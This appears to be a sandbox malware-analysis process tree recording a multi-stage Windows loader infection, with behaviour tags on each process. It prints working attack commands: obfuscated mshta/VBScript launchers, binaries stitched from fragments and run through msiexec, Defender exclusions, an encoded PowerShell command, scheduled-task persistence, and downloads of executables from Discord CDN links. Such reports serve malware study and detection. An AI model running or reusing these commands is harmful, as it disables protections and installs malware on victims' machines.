C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cLOsE ( crEaTeoBjEct ( "wsCriPT.ShEll" ). ruN ( "cMD /Q /r copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe"" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If """" == """" for %K in ( ""C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe"") do taskkill /f /IM ""%~NXK"" " , 0 , tRuE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If "" == "" for %K in ( "C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exe") do taskkill /f /IM "%~NXK"8⤵
-
C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscriPT: cLOsE ( crEaTeoBjEct ( "wsCriPT.ShEll" ). ruN ( "cMD /Q /r copY /Y ""C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe"" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If ""/pzztRb0w26vFPLWe3xRyQv "" == """" for %K in ( ""C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe"") do taskkill /f /IM ""%~NXK"" " , 0 , tRuE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r copY /Y "C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe" ..\GhXkKMW.EXe && sTarT ..\GhXkKMW.Exe /pzztRb0w26vFPLWe3xRyQv & If "/pzztRb0w26vFPLWe3xRyQv " == "" for %K in ( "C:\Users\Admin\AppData\Local\Temp\GhXkKMW.EXe") do taskkill /f /IM "%~NXK"11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPT: cLose ( creATeoBjECt ( "WscriPT.shELL" ). ruN ( "cmD.Exe /c eCHo | SeT /p = ""MZ"" > CejRuqC.56S & copY /Y /b CEJRUqC.56S + D5S9N.M + HOdVbD.N + 6Gk1G.c4O + JN1iGT.j ..\32aZBXCS.EP& sTARt msiexec.exe -y ..\32AZBxCS.EP & del /Q * " , 0 , True ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | SeT /p = "MZ" > CejRuqC.56S & copY /Y /b CEJRUqC.56S + D5S9N.M + HOdVbD.N + 6Gk1G.c4O + JN1iGT.j ..\32aZBXCS.EP& sTARt msiexec.exe -y ..\32AZBxCS.EP & del /Q *11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>CejRuqC.56S"12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y ..\32AZBxCS.EP12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM "Tue015b6b3a9094.exe"9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01c87a0e667ccf.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c87a0e667ccf.exeTue01c87a0e667ccf.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\mn.exe"C:\Users\Admin\AppData\Local\Temp\mn.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 2688⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01ef2dca82e926ed.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exeTue01ef2dca82e926ed.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exeC:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exeC:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01ef2dca82e926ed.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01d0efb597f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01d0efb597f.exeTue01d0efb597f.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ngexauzae.vbs"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAEkAZAAgADQAMgAyADgAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjAHEAZQBzAGsAcgB4AC4AZQB4AGUAIgA7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAiACAALQBGAG8AcgBjAGUA8⤵
-
C:\Users\Admin\AppData\Local\Temp\cqeskrx.exe"C:\Users\Admin\AppData\Local\Temp\cqeskrx.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01694542e4ea7f27.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01694542e4ea7f27.exeTue01694542e4ea7f27.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0151406c8f0ef2187.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0151406c8f0ef2187.exeTue0151406c8f0ef2187.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
-
C:\Users\Admin\Pictures\Adobe Films\NlV_KHWPqUv4Ag512VH5HAsr.exe"C:\Users\Admin\Pictures\Adobe Films\NlV_KHWPqUv4Ag512VH5HAsr.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\aVCJWuC78D8ytjpBnuonYiMt.exe"C:\Users\Admin\Pictures\Adobe Films\aVCJWuC78D8ytjpBnuonYiMt.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Jm8HLB0eQU3BTdk5zhJMuwPW.exe"C:\Users\Admin\Pictures\Adobe Films\Jm8HLB0eQU3BTdk5zhJMuwPW.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Jm8HLB0eQU3BTdk5zhJMuwPW.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\Jm8HLB0eQU3BTdk5zhJMuwPW.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Jm8HLB0eQU3BTdk5zhJMuwPW.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\xGgxfdTAZIxYAbC9nMWHnOyd.exe"C:\Users\Admin\Pictures\Adobe Films\xGgxfdTAZIxYAbC9nMWHnOyd.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\u0K_F2OTXf91BubRsbpokJYY.exe"C:\Users\Admin\Pictures\Adobe Films\u0K_F2OTXf91BubRsbpokJYY.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\UFx4mzvwha3EyrqLzYRJLozs.exe"C:\Users\Admin\Pictures\Adobe Films\UFx4mzvwha3EyrqLzYRJLozs.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\2yLYaayaS4pR2KzWoSRgna2g.exe"C:\Users\Admin\Pictures\Adobe Films\2yLYaayaS4pR2KzWoSRgna2g.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\romvpIxpDE1uboJ16Eu3W7ev.exe"C:\Users\Admin\Pictures\Adobe Films\romvpIxpDE1uboJ16Eu3W7ev.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\BGqO3niAQXAkx7UzE_hV4y9E.exe"C:\Users\Admin\Pictures\Adobe Films\BGqO3niAQXAkx7UzE_hV4y9E.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\lMlX5EPEJIQZ_lRN_WiFkWW1.exe"C:\Users\Admin\Pictures\Adobe Films\lMlX5EPEJIQZ_lRN_WiFkWW1.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a718b4e8-007c-4eb7-94a4-6576433f12b8\AdvancedRun.exe" /SpecialRun 4101d8 36529⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe" -Force8⤵
-
C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"C:\Users\Admin\Pictures\Adobe Films\3njmFt3PLb0IZOblGWW3FUDf.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\y7zS9k1Ws2gUJrtdj2Q96yXF.exe"C:\Users\Admin\Pictures\Adobe Films\y7zS9k1Ws2gUJrtdj2Q96yXF.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\T7hE04_dLWXUHYf9p1fLrFgZ.exe"C:\Users\Admin\Documents\T7hE04_dLWXUHYf9p1fLrFgZ.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\_DIAD_8FkBX7wiZEE_6DT5or.exe"C:\Users\Admin\Pictures\Adobe Films\_DIAD_8FkBX7wiZEE_6DT5or.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\0CZzT_SbBBjSwdGZ8u_LIiCd.exe"C:\Users\Admin\Pictures\Adobe Films\0CZzT_SbBBjSwdGZ8u_LIiCd.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\DyZmhMbt7fIZ0cXKhkFYkhyN.exe"C:\Users\Admin\Pictures\Adobe Films\DyZmhMbt7fIZ0cXKhkFYkhyN.exe"9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\gUH_grZeEjNkRezN2HwYxDzk.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )13⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC14⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "gUH_grZeEjNkRezN2HwYxDzk.exe"12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\tY9mbnr7DlvhFnRuAJK8dDk1.exe"C:\Users\Admin\Pictures\Adobe Films\tY9mbnr7DlvhFnRuAJK8dDk1.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\Cdy0nsQnBWPiGFHO_iFNTyWE.exe"C:\Users\Admin\Pictures\Adobe Films\Cdy0nsQnBWPiGFHO_iFNTyWE.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe"C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe"C:\Users\Admin\Pictures\Adobe Films\mHNJCsmtrK0FHJkzRUTU2mtk.exe" -u10⤵
-
C:\Users\Admin\Pictures\Adobe Films\gCsdNoPCEI7ErkSz1cNAHOCW.exe"C:\Users\Admin\Pictures\Adobe Films\gCsdNoPCEI7ErkSz1cNAHOCW.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BA4M8.tmp\gCsdNoPCEI7ErkSz1cNAHOCW.tmp"C:\Users\Admin\AppData\Local\Temp\is-BA4M8.tmp\gCsdNoPCEI7ErkSz1cNAHOCW.tmp" /SL5="$2034A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\gCsdNoPCEI7ErkSz1cNAHOCW.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-2MRCB.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-2MRCB.tmp\DYbALA.exe" /S /UID=270911⤵
-
C:\Program Files\MSBuild\LLGXRUZBEI\foldershare.exe"C:\Program Files\MSBuild\LLGXRUZBEI\foldershare.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\bd-b8445-652-9069f-6a9626fbd2412\Hatawaxeje.exe"C:\Users\Admin\AppData\Local\Temp\bd-b8445-652-9069f-6a9626fbd2412\Hatawaxeje.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\a7-4228d-af6-707b9-3db33301553dc\Daexogyxigu.exe"C:\Users\Admin\AppData\Local\Temp\a7-4228d-af6-707b9-3db33301553dc\Daexogyxigu.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wl2l3oi.rct\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\5wl2l3oi.rct\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\5wl2l3oi.rct\GcleanerEU.exe /eufive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q0eq2owu.skh\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\q0eq2owu.skh\installer.exeC:\Users\Admin\AppData\Local\Temp\q0eq2owu.skh\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exeC:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe"C:\Users\Admin\AppData\Local\Temp\x1fx5gs4.hto\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n01a0ufk.33h\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\n01a0ufk.33h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\n01a0ufk.33h\gcleaner.exe /mixfive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55vnohtc.mgo\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\Pictures\Adobe Films\xqAQrw5h6EoewxGR1rucN7IG.exe"C:\Users\Admin\Pictures\Adobe Films\xqAQrw5h6EoewxGR1rucN7IG.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1d0,0x1d4,0x1d8,0x180,0x1dc,0x7ffb6f4ddec0,0x7ffb6f4dded0,0x7ffb6f4ddee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff638289e70,0x7ff638289e80,0x7ff638289e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,2707089000516117176,5353714566748904763,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9212_946421353" --mojo-platform-channel-handle=1632 /prefetch:812⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\k8rkFQ618whqQvozq5sqYJAv.exe"C:\Users\Admin\Pictures\Adobe Films\k8rkFQ618whqQvozq5sqYJAv.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"8⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"C:\Users\Admin\Pictures\Adobe Films\MZGnU5fdSxCORNKj98rM7R3_.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\UQ2PodDKeOfQz8RMLdhjHRBY.exe"C:\Users\Admin\Pictures\Adobe Films\UQ2PodDKeOfQz8RMLdhjHRBY.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\7FD8.bat "C:\Users\Admin\Pictures\Adobe Films\UQ2PodDKeOfQz8RMLdhjHRBY.exe""8⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902440338659090486/902440724484730900/18.exe" "18.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/902440338659090486/902440374369411072/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵
-
C:\Users\Admin\AppData\Local\Temp\956\18.exe18.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\956\Transmissibility.exeTransmissibility.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\7FD6.tmp\7FD7.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵
-
